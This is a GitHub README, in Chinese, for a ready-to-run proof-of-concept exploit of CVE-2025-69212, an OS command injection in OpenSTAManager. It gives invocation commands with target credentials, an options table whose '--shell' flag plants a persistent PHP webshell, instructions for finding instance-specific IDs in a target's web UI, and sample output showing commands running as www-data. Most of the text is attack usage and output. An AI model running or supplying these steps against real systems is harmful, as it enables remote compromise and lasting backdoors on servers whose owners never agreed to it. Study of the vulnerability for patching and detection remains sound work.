alaeddine03/CVE-2025-69212-PoC
GitHub: alaeddine03/CVE-2025-69212-PoC
针对 OpenSTAManager OS 命令注入漏洞(CVE-2025-69212)的概念验证工具,支持远程命令执行和 webshell 植入。
Stars: 0 | Forks: 0
# CVE-2025-69212 - OpenSTAManager OS 命令注入 PoC
## 用法
安装依赖:
```
pip install -r requirements.txt
```
运行单个命令并打印其输出:
```
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
```
或者,植入一个持久化的 PHP webshell:
```
python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' --shell
```
### 选项
| 标志 | 描述 |
|---|---|
| `-u, --url` | 目标实例的 Base URL |
| `-U, --username` | 用于身份认证的 Username |
| `-P, --password` | 用于身份认证的 Password |
| `-c, --command` | 要执行的命令,输出保存至 `pwn_out.txt` |
| `--shell` | 在 `files/shell.php` 植入一个 PHP webshell,而不是运行单个命令 |
| `--id-module` | 发票导入功能的 Module ID(默认:14) |
| `--id-plugin` | 发票导入功能的 Plugin ID(默认:48) |
`id_module` 和 `id_plugin` 是特定于实例的。如果默认值不起作用,请登录目标的 Web UI,导航至电子发票导入功能,并在浏览器的网络选项卡中检查请求参数。
### 示例输出
```
$ python3 cve-2025-69212_poc.py -u http://target.com -U admin -P 'password' -c 'id'
[*] Logging in as admin ...
[+] Authenticated.
[*] Building payload to run: id
[*] Uploading exploit ZIP to id_module=14 id_plugin=48 ...
[*] Server responded: HTTP 500 (500 after command execution is expected)
[*] Fetching command output from http://target.com/files/pwn_out.txt ...
[+] Command output:
--------------------------------------------------
uid=33(www-data) gid=33(www-data) groups=33(www-data)
--------------------------------------------------
```
标签:OS命令注入, PoC, Python, Webshell, 无后门, 暴力破解, 逆向工具